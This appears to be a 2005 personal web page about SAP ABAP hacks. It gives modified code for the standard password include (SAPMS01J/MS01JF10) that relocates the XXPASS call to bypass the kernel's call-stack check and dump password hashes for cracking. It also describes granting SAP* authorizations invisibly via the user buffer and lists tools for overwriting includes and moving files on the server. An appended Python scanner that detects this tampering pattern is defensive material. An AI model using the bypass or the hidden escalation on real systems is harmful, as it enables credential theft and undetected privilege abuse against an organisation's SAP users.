My ABAP code is under the GPL license. Click here to get a copy.
There are several programs on the internet to get SAP* authorizations. Here you find my own version. The nice thing is that it does not change the user profile, but only the user buffer for authorization. So it is invisible to most programs checking users for critical authorizations.
There are cute programs on the internet that implement a kind of dictionary password checking. This was fine until something changed in the SAP kernel. Now the calls to check_pass are somehow checked, with the result that if they are called from a Z or Y program the user is locked and kicked out of the system; all other reports are tentatively fooled with strange data I don't understand. This is a bit harsh a treatment for a poor sysadmin trying to get his users to choose reasonable passwords.
One argument could be that there is a very nice system to specify patterns for forbidden passwords in some table somewhere, so that users cannot choose these passwords. So there is no need to call the password hashing code directly. And this is true, but it is far less powerful than the good old Unix crack.
So one could want to do it anyway. And here is a "simple" way to do it.
Just copy the coding in check_pass to another form and call this form "externally" from the form set_new_pass or check_pass. And voilà, it works and you can get all the password hashes that you want. It seems that the xxpass code looks at the call stack... changing the call stack seems to be the trick. Here is an example:

*---------------------------------------------------------------------*
*       FORM SET_NEW_PASS                                             *
*---------------------------------------------------------------------*
*       Set new password.                                             *
*---------------------------------------------------------------------*
FORM SET_NEW_PASS USING USER NEWCODE NEWCODE1 RC.
  perform do_it in program SAPMS01J USING USER NEWCODE NEWCODE1 RC.
ENDFORM.

form do_it USING USER NEWCODE NEWCODE1 RC.
  SELECT SINGLE * FROM USR02
    WHERE BNAME = USER.
  IF SY-SUBRC <> 0.
    RC = 274.
*   message e274 with user.
  ENDIF.
  SY-SUBRC = 0.
  MOVE-CORRESPONDING USR02 TO *USR02.            " note 154401/2
  PERFORM SHIFT_OLD_PASS.
  CALL 'XXPASS'
    ID 'CODE'     FIELD NEWCODE
    ID 'CODX'     FIELD USR02-BCODE
    ID 'NAME'     FIELD USR02-BNAME
    ID 'VERS'     FIELD USR02-CODVN
    ID 'PASSCODE' FIELD USR02-PASSCODE.          "new as of 6.20
  CLEAR USR02-LTIME.
  UPDATE USR02.
  IF SY-SUBRC <> 0.
    RC = 297.
*   message s297.
  ELSE.
    PERFORM WRITE_USH02.
  ENDIF.
  RC = 0.
* message s277 with user.
endform.

The same works with check_pass in the same include. An easy way to get the modified version of MS01JF10 into your system could be using the include uploader. Here is the whole include:
Change table T000 in direct input
Get a file from the application server's file system
Put a file onto the application server's file system
Upload include: overwrites the include
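
The modification described above leaves a recognisable pattern in the include source, so it can be searched for in exported ABAP text. The following Python scan is an added example, not part of the original article or of SAP's code: it flags a CALL 'XXPASS' outside the forms named above and any external PERFORM into SAPMS01J. The sample sources, the finding names, the program name ZPWCHECK and the assumption that the unmodified include calls XXPASS directly inside set_new_pass/check_pass are constructed for illustration.

```python
import re

GUARDED_FORMS = {"SET_NEW_PASS", "CHECK_PASS"}  # forms the page names
TARGET = "SAPMS01J"                             # program the page names
EXT_PERFORM = re.compile(r"PERFORM (\w+)(?: IN PROGRAM |\()(\w+)")

def statements(source):
    """Yield upper-cased ABAP statements with comments stripped."""
    kept = []
    for line in source.splitlines():
        if not line.startswith("*"):            # '*' in column 1 = comment line
            kept.append(line.split('"', 1)[0])  # drop inline "comment
    # Simplification: splits on every '.', so literals containing '.' would break.
    for stmt in " ".join(kept).split("."):
        stmt = " ".join(stmt.split()).upper()
        if stmt:
            yield stmt

def scan(name, source):
    """Return (finding, source name, enclosing form) tuples."""
    findings, form = [], None
    for stmt in statements(source):
        ext = EXT_PERFORM.match(stmt)
        if stmt.startswith("FORM "):
            form = stmt.split()[1]
        elif stmt == "ENDFORM":
            form = None
        elif stmt.startswith("CALL 'XXPASS'") and form not in GUARDED_FORMS:
            findings.append(("XXPASS_RELOCATED", name, form))
        elif ext and ext.group(2) == TARGET:
            kind = "STACK_TRAMPOLINE" if form in GUARDED_FORMS else "EXTERNAL_PERFORM"
            findings.append((kind, name, form))
    return findings

# Constructed sample sources (assumptions, not real system exports).
TAMPERED = """\
* constructed copy of the pattern shown in the article
FORM SET_NEW_PASS USING USER NEWCODE NEWCODE1 RC.
  perform do_it in program SAPMS01J USING USER NEWCODE NEWCODE1 RC.
ENDFORM.
form do_it USING USER NEWCODE NEWCODE1 RC.
  CALL 'XXPASS' ID 'CODE' FIELD NEWCODE
                ID 'PASSCODE' FIELD USR02-PASSCODE. "new as of 6.20
endform.
"""
CLEAN = "FORM SET_NEW_PASS USING USER NEWCODE NEWCODE1 RC.\n  CALL 'XXPASS' ID 'CODE' FIELD NEWCODE.\nENDFORM.\n"
ZREPORT = "REPORT ZPWCHECK.\nPERFORM check_pass(SAPMS01J) USING u p rc.\n"

if __name__ == "__main__":
    for n, s in (("MS01JF10", TAMPERED), ("MS01JF10", CLEAN), ("ZPWCHECK", ZREPORT)):
        print(n, scan(n, s))
```

A finding in the include is a reason to compare it against the vendor-delivered version and to check the include's modification log.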
Copyright © 2005 Krapinskij
Verbatim copying and distribution of this entire article are permitted
worldwide, without royalty, in any medium, provided this notice, and the
copyright notice, are preserved.
Last update 28/10/2005 14:58